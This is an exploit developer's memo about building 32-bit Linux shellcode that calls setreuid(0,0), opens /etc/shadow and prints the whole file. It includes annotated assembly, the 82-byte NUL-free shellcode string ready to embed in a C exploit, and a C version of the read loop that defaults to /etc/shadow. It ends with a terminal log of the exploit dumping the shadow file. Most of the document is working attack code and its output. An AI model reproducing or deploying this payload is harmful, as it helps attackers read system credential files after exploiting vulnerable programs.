NENote of Exploiting


2006-11-23 : Print Shadow Payload 2

This is a memo on writing a payload. I created the print_shadow payload earlier, but that payload reads only the first 256 bytes of /etc/shadow. So I refined print_shadow.s and created the print_shadow_02.s payload. This payload reads /etc/shadow from the beginning to the end of the file.

When the read system call reaches end of file, it returns 0. When an error occurs, the raw system call returns a negative errno value (the libc wrapper turns this into -1 and sets errno). Otherwise, the system call returns the number of bytes read.
So I use this behavior: after calling the read system call, I check the value of the eax register with a test instruction. If eax is 0, the job is complete. Otherwise, the payload judges that the file has more characters and goes around the loop again. Note that the payload tests only for zero; a negative return value (an error) would not stop the loop.
In this payload's loop, one byte is read from the file and one byte is written to the screen, repeated until end of file.
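The same read/write loop, written in C as an added example (this is not code from the original page or the author's exploit.c). It assumes a POSIX system; the temporary file template /tmp/shadowXXXXXX and the three shadow-style lines in self_test() are constructed for the self-check and are not real shadow data. It goes slightly beyond the payload: where the shellcode tests only for a zero return, this version returns -1 on a negative read() result, and it generalises the one-byte loop to a buffered copy that also handles short writes and EINTR.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Copy everything readable from in_fd to out_fd.
 * Returns the number of bytes copied, or -1 on error (errno set). */
long cat_fd(int in_fd, int out_fd)
{
    char buf[4096];
    long total = 0;

    for (;;) {
        ssize_t n = read(in_fd, buf, sizeof buf);
        if (n == 0)            /* EOF: the condition the payload's jz tests */
            return total;
        if (n < 0) {           /* error: the case the payload never checks */
            if (errno == EINTR)
                continue;
            return -1;
        }
        /* write() may accept fewer bytes than asked for; loop until done */
        ssize_t off = 0;
        while (off < n) {
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) {
                if (errno == EINTR)
                    continue;
                return -1;
            }
            off += w;
        }
        total += n;
    }
}

/* Open path read-only, like the payload's open("/etc/shadow", O_RDONLY),
 * and dump it to out_fd. Returns bytes copied or -1. */
long cat_path(const char *path, int out_fd)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    long r = cat_fd(fd, out_fd);
    int saved = errno;
    close(fd);
    errno = saved;
    return r;
}

/* Self-check on constructed input (not a real shadow file): write a few
 * shadow-style lines to a temporary file, copy it through cat_path() into a
 * pipe, and verify that exactly the same bytes come out.
 * Returns 1 on success, 0 on failure. */
int self_test(void)
{
    static const char sample[] =
        "root:*:13462:0:99999:7:::\n"
        "daemon:*:13462:0:99999:7:::\n"
        "nobody:*:13462:0:99999:7:::\n";
    char tmpl[] = "/tmp/shadowXXXXXX";   /* assumed writable temp location */
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return 0;
    size_t len = strlen(sample);
    int ok = write(fd, sample, len) == (ssize_t)len;
    close(fd);

    int pfd[2];
    if (!ok || pipe(pfd) < 0) {
        unlink(tmpl);
        return 0;
    }
    long copied = cat_path(tmpl, pfd[1]);
    close(pfd[1]);
    char out[256];
    ssize_t got = read(pfd[0], out, sizeof out);
    close(pfd[0]);
    unlink(tmpl);
    return copied == (long)len && got == (ssize_t)len &&
           memcmp(out, sample, len) == 0;
}

int main(int argc, char **argv)
{
    /* With no argument this does what the payload does; it only succeeds
     * when run with enough privilege to open /etc/shadow. */
    const char *path = argc > 1 ? argv[1] : "/etc/shadow";
    long n = cat_path(path, STDOUT_FILENO);
    if (n < 0) {
        perror(path);
        return 1;
    }
    fprintf(stderr, "copied %ld bytes\n", n);
    return 0;
}
```

Run it as ./a.out /etc/passwd to see the loop work on a readable file, or as root with no argument to reproduce the payload's behaviour; a bad descriptor or an unreadable path ends the loop with -1 instead of spinning.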

[SC] print_shadow_02.s


.globl main

main:
    pushl   %ebp
    movl    %esp,   %ebp

    #setreuid(0, 0): syscall 0x46 (sys_setreuid), ruid = euid = 0
    xorl   %eax,   %eax
    mov    $0x46,  %al
    xorl   %ebx,   %ebx
    xorl   %ecx,   %ecx
    int    $0x80

    jmp ONE                     # jmp/call trick: gets the address of the path string onto the stack

TWO:
    #open("/etc/shadow", O_RDONLY): syscall 0x5
    popl   %ebx                 # ebx = address of "/etc/shadow" (pushed by call TWO)
    movb   $0x5,   %al          # eax was 0 after a successful setreuid, so eax = 5
    movb   %cl,    11(%ebx)     # cl = 0: NUL-terminate the path at run time (keeps the payload NUL-free)
    int    $0x80                # ecx = 0 = O_RDONLY
    movl   %eax,   %ebx         # ebx = file descriptor

loop:
    #read(fd, esp, 1): syscall 0x3
    xorl   %edx,   %edx
    inc    %edx                 # edx = 1: read one byte
    movl   %esp,   %ecx         # ecx = buffer, one byte on the stack
    xorl   %eax,   %eax
    movb   $0x3,   %al
    int    $0x80
    movl   %ebx,   %esi         # save fd in esi; write needs ebx
    test   %eax,   %eax
    jz     done                 # 0 = end of file (a negative error value is not checked)

    #write(1, esp, 1): syscall 0x4
    movb   $0x4,   %al          # eax was 1 (bytes read), so eax = 4
    xorl   %ebx,   %ebx
    movb   $0x1,   %bl          # ebx = 1 = stdout; ecx and edx are still buffer and count
    int    $0x80
    movl   %esi,   %ebx         # restore fd
    jmp    loop

done:
    #close(fd): syscall 0x6
    movb   $0x6,   %al          # eax was 0 (EOF), so eax = 6
    movl   %esi,   %ebx
    int    $0x80

    #exit(0): syscall 0x1
    movb   $0x1,   %al          # eax was 0 after close, so eax = 1
    xorl   %ebx,   %ebx
    int    $0x80

ONE:
    call    TWO                 # pushes the address of the string below as the return address
    .string "/etc/shadow"

Exemplification

I converted this source code to machine-code bytes and embedded the payload in a C exploit ([SC] exploit.c) as follows. The resulting 82-byte payload contains no NUL byte; the terminating NUL of "/etc/shadow" is written at run time by the movb %cl, 11(%ebx) instruction, so the payload memory must be writable.


char shellcode[]=
"\x55\x89\xe5\x31\xc0\xb0\x46\x31\xdb\x31"
"\xc9\xcd\x80\xeb\x33\x5b\xb0\x05\x88\x4b"
"\x0b\xcd\x80\x89\xc3\x31\xd2\x42\x89\xe1"
"\x31\xc0\xb0\x03\xcd\x80\x89\xde\x85\xc0"
"\x74\x0c\xb0\x04\x31\xdb\xb3\x01\xcd\x80"
"\x89\xf3\xeb\xe3\xb0\x06\x89\xf3\xcd\x80"
"\xb0\x01\x31\xdb\xcd\x80\xe8\xc8\xff\xff"
"\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"
"\x6f\x77"
;

Next, I compiled and executed this exploit program as follows.

defolos@glazheim:~/Desktop$ gcc exploit.c
defolos@glazheim:~/Desktop$ ./a.out
sp = 0xbffff918
ret = 0xbffff918
-------exploit---------------
root:[root's password]:13462:0:99999:7:::
daemon:*:13462:0:99999:7:::
bin:*:13462:0:99999:7:::
sys:*:13462:0:99999:7:::
sync:*:13462:0:99999:7:::
games:*:13462:0:99999:7:::
man:*:13462:0:99999:7:::
lp:*:13462:0:99999:7:::
mail:*:13462:0:99999:7:::
news:*:13462:0:99999:7:::
uucp:*:13462:0:99999:7:::
proxy:*:13462:0:99999:7:::
www-data:*:13462:0:99999:7:::
backup:*:13462:0:99999:7:::
list:*:13462:0:99999:7:::
irc:*:13462:0:99999:7:::
gnats:*:13462:0:99999:7:::
nobody:*:13462:0:99999:7:::
Debian-exim:!:13462:0:99999:7:::
defolos:[defolos's password]:13462:0:99999:7:::
identd:!:13463:0:99999:7:::
sshd:!:13463:0:99999:7:::
canna:!:13463:0:99999:7:::
messagebus:!:13463:0:99999:7:::
hal:!:13463:0:99999:7:::
saned:!:13463:0:99999:7:::
gdm:!:13463:0:99999:7:::
defolos@glazheim:~/Desktop$

I found that this payload prints the whole contents of /etc/shadow to the screen. I now have a method that reads a file to its end and prints it to the screen.

Issues

Copyleft (C) 2007 Len. All Rights Not Reserved.